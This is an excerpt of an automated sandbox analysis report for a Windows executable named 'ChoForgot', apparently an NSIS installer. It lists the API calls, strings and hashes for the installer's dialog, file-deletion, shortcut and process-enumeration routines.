                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: FilePointer
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 973152223-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessageSend
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2492992576-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                                                                                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                                                                                                                                                                                                                                                        • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                                                                                                                                                                                                                                                        • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                                                                                                                                                                                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                                                                                                                                                                                                                                                        • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                                                                                                                                                                                                                                                        • DeleteObject.GDI32(?), ref: 00404AA5
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                                                                                                                                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                                                                                                                                                                                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                                                                                                                                                                                                                                                        • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                                                                                                                                                                                                                                                                        • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                                                                                                                                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000000), ref: 00404F87
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                                                                                                        • String ID: $ @$M$N
                                                                                                                                                                                                                                                                                                        • API String ID: 1638840714-3479655940
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                                                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                                                                                                                                                                                                                                                        • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                                                                                                                                                                                                                                                                        • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(?), ref: 00406E5F
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        • \*.*, xrefs: 00406D2F
                                                                                                                                                                                                                                                                                                        • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                                                                                                                                                                                                                                                        • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                                                                                                                                                                                                                                                        • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                                                                                                                                                                                                                                                        • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                                                                                                                                                                                                                                                        • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                                                                                                                                                                                                                                                        • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                                                                                                                                                                                                                                                        • ptF, xrefs: 00406D1A
                                                                                                                                                                                                                                                                                                        • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                                                                                        • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                                                                                                                                                                                                                                                                        • API String ID: 2035342205-1650287579
                                                                                                                                                                                                                                                                                                        • Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                                                                                                                                                        • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                                                                                                                                                                                                                                                                        • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                                                                                                                                                                                                                                                                        • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                                                                                                                                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                                                                                                                                                                                                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                                                                                                                                                                                                                                                        • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                                                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                                                                                                                                                                                                                                                                        • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                                                                                                                                                                                                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                                                                                                                                                                                                                                                        • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                                                                                                                                                                                                                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424170,762323A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                        • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                                                                                                                                                                                                                        • String ID: F$A
                                                                                                                                                                                                                                                                                                        • API String ID: 3347642858-1281894373
                                                                                                                                                                                                                                                                                                        • Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                                                                                                                                                        • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                                                                                        • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                                                                                                                                                                                                                                                                        • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                                                                                                                                                                                                                                                        • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                                                                                                                                                                                                                                                        • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00407212
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                                                                                                                                                                                                                        • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                                                                                                                                                                                                                        • API String ID: 1916479912-1189179171
                                                                                                                                                                                                                                                                                                        • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                                                                                                                                                        • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424170,762323A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                        • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                        • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                                                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,00424170,762323A0,00000000), ref: 00406A73
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                                                                                                                                                                                                                        • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                                                                                                        • API String ID: 3581403547-1792361021
                                                                                                                                                                                                                                                                                                        • Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                                                                                                                                                        • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CreateInstance
                                                                                                                                                                                                                                                                                                        • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                                                                                                                                                                                                                        • API String ID: 542301482-1377821865
                                                                                                                                                                                                                                                                                                        • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                                                                                                                                                        • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                        • Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                                                                                                                                                        • Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
Memory Dump Source
• Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
APIs
• GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
• lstrlenW.KERNEL32(?), ref: 004063F8
• GetVersionExW.KERNEL32(?), ref: 00406456
  • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
• LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
• GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
• GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
• GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
• FreeLibrary.KERNEL32(00000000), ref: 00406500
• GlobalFree.KERNEL32(?), ref: 00406509
Similarity
• API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
• String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
• API String ID: 20674999-2124804629
APIs
• CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
• GetDlgItem.USER32(?,000003E8), ref: 004041AD
• SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
• GetSysColor.USER32(?), ref: 004041DB
• SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
• SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
• lstrlenW.KERNEL32(?), ref: 00404202
• SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
• SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
  • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
  • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
  • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
• GetDlgItem.USER32(?,0000040A), ref: 00404276
• SendMessageW.USER32(00000000), ref: 0040427D
